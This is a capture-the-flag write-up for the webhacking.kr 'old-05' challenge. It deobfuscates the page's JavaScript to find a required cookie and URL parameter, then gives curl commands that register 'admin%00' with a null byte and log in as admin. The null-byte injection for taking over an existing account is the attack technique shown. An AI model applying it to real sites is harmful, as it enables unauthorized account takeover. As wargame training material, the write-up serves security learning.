old-05 -- JavaScript (RE + Null Byte Bypass)
URL: https://webhacking.kr/challenge/web-05/
We are given 2 options Login and Join. We certainly can't login, so we have to join. Unlucky for us Javascript blocks us from Join. If we inspect login we are redirected to https://webhacking.kr/challenge/web-05/mem/login.php and lucky for us if we visit /join.php we get a page.
Going to https://webhacking.kr/challenge/web-05/mem/join.php we get alert(bye).
View Source:
<html>
<title>Challenge 5</title>
</head>
<body bgcolor=black>
<center>
<script>
l = 'a';
ll = 'b';
lll = 'c';
llll = 'd';
lllll = 'e';
llllll = 'f';
lllllll = 'g';
llllllll = 'h';
lllllllll = 'i';
llllllllll = 'j';
lllllllllll = 'k';
llllllllllll = 'l';
lllllllllllll = 'm';
llllllllllllll = 'n';
lllllllllllllll = 'o';
llllllllllllllll = 'p';
lllllllllllllllll = 'q';
llllllllllllllllll = 'r';
lllllllllllllllllll = 's';
llllllllllllllllllll = 't';
lllllllllllllllllllll = 'u';
llllllllllllllllllllll = 'v';
lllllllllllllllllllllll = 'w';
llllllllllllllllllllllll = 'x';
lllllllllllllllllllllllll = 'y';
llllllllllllllllllllllllll = 'z';
I = '1';
II = '2';
III = '3';
IIII = '4';
IIIII = '5';
IIIIII = '6';
IIIIIII = '7';
IIIIIIII = '8';
IIIIIIIII = '9';
IIIIIIIIII = '0';
li = '.';
ii = '<';
iii = '>';
lIllIllIllIllIllIllIllIllIllIl = lllllllllllllll + llllllllllll + llll + llllllllllllllllllllllllll + lllllllllllllll + lllllllllllll + ll + lllllllll + lllll;
lIIIIIIIIIIIIIIIIIIl = llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + lll + lllllllllllllll + lllllllllllllll + lllllllllll + lllllllll + lllll;
if (eval(lIIIIIIIIIIIIIIIIIIl).indexOf(lIllIllIllIllIllIllIllIllIllIl) == -1) {
alert('bye');
throw "stop";
}
if (eval(llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + 'U' + 'R' + 'L').indexOf(lllllllllllll + lllllllllllllll + llll + lllll + '=' + I) == -1) {
alert('access_denied');
throw "stop";
} else {
document.write('<font size=2 color=white>Join</font><p>');
document.write('.<p>.<p>.<p>.<p>.<p>');
document.write('<form method=post action=' + llllllllll + lllllllllllllll + lllllllll + llllllllllllll + li + llllllllllllllll + llllllll + llllllllllllllll + '>');
document.write('<table border=1><tr><td><font color=gray>id</font></td><td><input type=text name=' + lllllllll + llll + ' maxlength=20></td></tr>');
document.write('<tr><td><font color=gray>pass</font></td><td><input type=text name=' + llllllllllllllll + lllllllllllllllllllllll + '></td></tr>');
document.write('<tr align=center><td colspan=2><input type=submit></td></tr></form></table>');
}
</script>
</body>
</html>I used VSCode to rename variables, F2 does global replace for variable names which is pretty neat!
let a = 'a';
let b = 'b';
let c = 'c';
let d = 'd';
let e = 'e';
let f = 'f';
let g = 'g';
let h = 'h';
let i = 'i';
let j = 'j';
let k = 'k';
let l = 'l';
let m = 'm';
let n = 'n';
let o = 'o';
let p = 'p';
let q = 'q';
let r = 'r';
let s = 's';
let t = 't';
let u = 'u';
let v = 'v';
let w = 'w';
let x = 'x';
let y = 'y';
let z = 'z';
let _1 = '1';
let _2 = '2';
let _3 = '3';
let _4 = '4';
let _5 = '5';
let _6 = '6';
let _7 = '7';
let _8 = '8';
let _9 = '9';
let _0 = '0';
let dot = '.';
let lt = '<';
let gt = '>';
let oldzombie = o + l + d + z + o + m + b + i + e;
let document_cookie = d + o + c + u + m + e + n + t + dot + c + o + o + k + i + e;
if (eval(document_cookie).indexOf(oldzombie) == -1) {
alert('bye');
throw "stop";
}
if (eval(d + o + c + u + m + e + n + t + dot + 'U' + 'R' + 'L').indexOf(m + o + d + e + '=' + _1) == -1) {
alert('access_denied');
throw "stop";
} else {
document.write('<font size=2 color=white>Join</font><p>');
document.write('.<p>.<p>.<p>.<p>.<p>');
document.write('<form method=post action=' + j + o + i + n + dot + p + h + p + '>');
document.write('<table border=1><tr><td><font color=gray>id</font></td><td><input type=text name=' + i + d + ' maxlength=20></td></tr>');
document.write('<tr><td><font color=gray>pass</font></td><td><input type=text name=' + p + w + '></td></tr>');
document.write('<tr align=center><td colspan=2><input type=submit></td></tr></form></table>');
}Note: Alternatively you could have ran the variables in Javascript Console and got values that way.
First we need to set oldzombie cookie and we need to send mode=1 in params
I registered with x:y and on login got
Hello x
You have to login as adminWe have to register with admin username, but it already exists... I tried padding with spaces, but that was also not working.
Injecting null byte allows us to bypass certain filter and login as admin:
➜ curl 'https://webhacking.kr/challenge/web-05/mem/join.php?mode=1' -b 'PHPSESSID=hi4uvai5sde90encr0ktq6879f' -b 'oldzombie=1' -d 'id=admin%00&pw=y'
<html>
<title>Challenge 5</title></head><body bgcolor=black><center>
<font size=2 color=white><script>alert('id already existed');</script>
➜ curl 'https://webhacking.kr/challenge/web-05/mem/login.php' -b 'PHPSESSID=hi4uvai5sde90encr0ktq6879f' -b 'oldzombie=1' -d 'id=admin%00&pw=y'
<html>
<head>
<title>Challenge 5</title>
</head>
<body bgcolor=black>
<center><font color=white>
Hello admin<br><script>alert('old-05 Pwned!');</script><hr>old-05 Pwned. You got 30point. Congratz!<hr></font>
<font color=black>
...Note:
admin+space+null_bytealso worked
Last updated